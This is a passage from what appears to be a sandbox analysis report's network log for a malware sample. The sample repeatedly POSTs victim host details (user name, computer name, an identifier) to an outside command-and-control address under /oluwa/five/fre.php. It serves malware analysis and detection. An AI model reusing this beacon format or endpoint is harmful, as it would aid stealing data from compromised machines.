May 5, 2022 08:47:10.510929108 CEST	8234	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:10 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.6	49855	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:11.530445099 CEST	8490	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:11.556226015 CEST	8490	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:11.612447977 CEST	8492	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:11 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.6	49868	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:13.688633919 CEST	8701	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:13.714560032 CEST	8702	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:13.771070957 CEST	8703	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:13 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.6	49879	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:17.057698011 CEST	9055	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:17.083367109 CEST	9068	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:17.142337084 CEST	9097	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:17 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.6	49886	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:24.286217928 CEST	9264	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:24.311959982 CEST	9264	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:24.758858919 CEST	9265	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:24 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.6	49887	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:28.539921045 CEST	9265	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:28.565720081 CEST	9266	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:28.615139008 CEST	9266	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:28 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.6	49888	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:31.023957968 CEST	9267	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:31.050134897 CEST	9267	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:31.104381084 CEST	9267	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:31 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49776	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:10.458256960 CEST	1157	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:10.484827995 CEST	1157	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:10.540349960 CEST	1157	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:10 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.6	49889	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:32.263125896 CEST	9268	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:32.289024115 CEST	9268	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:32.340547085 CEST	9268	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:32 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.6	49891	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:33.446894884 CEST	9276	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:33.472860098 CEST	9276	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:33.523540020 CEST	9276	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:33 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.6	49892	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:34.664293051 CEST	9277	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:34.691047907 CEST	9277	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:34.749701977 CEST	9278	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:34 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.6	49893	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:35.940589905 CEST	9278	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:35.967854023 CEST	9279	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:36.032215118 CEST	9279	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:35 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.6	49895	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:40.233323097 CEST	9296	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:40.259624958 CEST	9296	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:40.311688900 CEST	9296	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:40 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.6	49904	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:43.448687077 CEST	9305	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:43.474642992 CEST	9306	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:43.533077955 CEST	9307	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:43 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.6	49910	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:44.510409117 CEST	9318	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:44.536200047 CEST	9319	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:44.586188078 CEST	9320	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:44 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.6	49916	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:45.587445021 CEST	9331	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:45.613163948 CEST	9331	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:45.670989037 CEST	9333	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:45 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.6	49921	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:46.723903894 CEST	9342	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:46.750441074 CEST	9343	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:46.807706118 CEST	9343	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:46 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.6	49922	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:49.122828960 CEST	9344	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:49.148577929 CEST	9344	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:49.208786011 CEST	9344	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:49 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49777	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:11.786866903 CEST	1158	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:11.812916994 CEST	1158	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:11.871474981 CEST	1159	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:11 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.6	49923	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:51.765647888 CEST	9345	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:51.793185949 CEST	9345	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:51.848263025 CEST	9346	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:51 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.6	49925	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:53.606168985 CEST	9353	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:53.638679028 CEST	9353	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:53.703870058 CEST	9354	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:53 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.6	49926	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:55.260222912 CEST	9354	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:55.286011934 CEST	9355	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:55.342236996 CEST	9355	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:55 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.6	49927	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
